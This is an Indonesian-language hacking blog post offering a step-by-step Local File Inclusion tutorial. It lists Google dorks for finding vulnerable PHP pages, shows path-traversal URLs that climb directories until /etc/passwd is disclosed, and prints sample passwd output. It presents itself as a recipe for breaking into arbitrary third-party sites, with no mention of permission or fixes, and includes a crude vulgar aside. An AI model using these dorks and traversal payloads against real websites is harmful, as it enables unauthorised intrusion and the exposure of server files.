LOCAL FILE INCLUSION

Ferdark
Ferdark
Februari 13, 2021

 HALO ASSALAMUALAIKUM WR WB

KALI INI ADALAH TUTORIAL LOCAL FILE INCLUSION (LFI)

APA ITU LOCAL FILE INCLUSION

Orang penyerang dapat menggunakan Penyertaan File Lokal File, Local File Inclusion, (LFI) untuk mengelabui aplikasi web agar mengekspos atau menjalankan file di server web. Serangan LFI dapat menyebabkan pengungkapan informasi, eksekusi kode jarak jauh, atau bahkan Cross-site Scripting (XSS).

Ok langsung saja ke tutorial nya 

Bahan² 

-dork

inurl:/view/lang/index.php?page=?page=

inurl:/shared/help.php?page=

-kouta

-muka Gans

Makanya ganteng kontl

Anggap saja saya sudah punya target

Target.com/page=shop.php

Nah hapus sampai=

Masukan directory nya ../../../

Target.com/page=../../../

Kalau blank biasa nya vuln 

Masukin Payload nya

Target.com/page=../../../etc/passwd

Nah blank tambah saja directory tambah sampai file nya keluar yah gan

Target.com/page=../../../../etc/passwd

Masih blank tambah lagi aja yah gan

Target.com/page=../../../../../etc/passwd

Dann boom Berhasil kalo berhasil ada bacaan seperti ini

 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:104::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin tcc:x:1416:1416::/home/tcc/:/bin/sh bug:x:1341:1341::/home/bug/:/bin/sh

Note : jika blank tambah saja directory nya atau bisa pakai Payload lain yg ada di apk hackbar

Sekian dan terimakasih